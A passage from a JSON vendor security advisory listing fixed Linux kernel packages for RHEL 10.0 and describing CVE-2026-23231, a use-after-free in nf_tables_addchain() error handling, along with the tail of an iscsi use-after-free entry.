"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: scsi: target: iscsi: Fix use-after-free in iscsit_dec_session_usage_count()"
},
{
"cve": "CVE-2026-23231",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2026-03-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444376"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. A local attacker with CAP_NET_ADMIN capabilities, or remote packet traffic, could exploit a use-after-free vulnerability in the nf_tables_addchain() function\u0027s error handling. Successful exploitation could lead to a kernel crash, resulting in a Denial of Service (DoS), or potentially privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: kernel: Privilege escalation or denial of service via use-after-free in nf_tables_addchain()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A use after free can occur in nf_tables_addchain error handling because a new chain is published to table chains via RCU before hook registration completes and is then freed without an RCU grace period when hook registration fails. This creates a race with RCU readers in the control plane such as nf_tables_dump_chains and also with in flight packet evaluation when an IPv4 hook is transiently installed for NFPROTO_INET and later IPv6 hook registration fails. For the CVSS the PR is L because a local actor with CAP_NET_ADMIN can induce the failing add chain path while remote packet traffic may hit the transient hook and trigger the UAF window. Impact ranges from a kernel crash to potential privilege escalation.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
